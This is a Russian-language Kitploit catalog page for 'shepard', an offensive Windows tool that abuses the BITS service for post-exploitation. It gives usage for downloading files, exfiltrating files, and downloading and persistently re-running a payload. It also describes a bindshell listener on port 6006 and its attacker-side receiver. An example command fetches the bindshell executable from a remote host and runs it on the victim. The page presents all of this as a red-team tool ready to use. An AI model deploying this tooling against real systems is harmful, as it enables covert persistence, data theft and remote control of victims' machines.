Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
shepard — Инструмент для постоянной загрузки/выгрузки/выполнения в процессе с использованием Windows BITS. | Kitploit
Инструменты/GitHubGitHub/d3adzo/shepard
Механизмы персистентностиЭксфильтрация данныхПост-эксплуатацияКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubd3adzo/shepard

shepard

Инструмент для постоянной загрузки/выгрузки/выполнения в процессе с использованием Windows BITS.

Репозиторий
4134 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SHEPARD

BITS

Это инструмент персистентности, использующий фоновую интеллектуальную службу передачи Windows (BITS).

Функциональность

Загрузка файлов, Экфильтрация файлов, Загрузка файлов + Постоянное выполнение

Использование

Запустите shepard.exe от имени администратора со следующими аргументами командной строки:

-d <remoteLocation> <writePath> : обычная загрузка файла в локальный путь по вашему выбору

-e <remoteLocation> <localPath> : обычная выгрузка файла из локального пути по вашему выбору (отправляет только на IIS-сервер, это ограничение BITS)

-dr <remoteLocation> <writePath> [optionalFileArgs] : загрузка файла в путь по вашему выбору с попыткой поддержания персистентности. Загруженный файл будет пытаться запускаться с optionalFileArgs, и BITS будет проверять каждые 30 секунд, что файл всё ещё работает на скомпрометированной системе.

Запуск этого исполняемого файла без аргументов или с неверным количеством аргументов приведёт к чистому завершению shepard.

BINDSHELL

Сервер (жертва) написан на C#. Он прослушивает порт 6006.

Использование на стороне жертвы

Запустите shepardsbind_serv.exe без аргументов.

Клиент (атакующий) написан на Python и принимает один аргумент: IP-адрес машины жертвы.

Использование сервера

shepardsbind_recv.py <victim's IP>

Запуск shepardsbind_recv.py без аргументов вернёт ошибку.

Использование вместе

Единственный исполняемый файл, который должен быть на машине жертвы — это shepard.exe. Разместите загружаемый исполняемый файл bindshell в общедоступном месте. Shepard загрузит и запустит исполняемый файл bindshell, и пользователь теперь может использовать python-приёмник. Если оболочка будет обнаружена и уничтожена, она перезапустится через 30 секунд.

Пример: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe

Скачать инструмент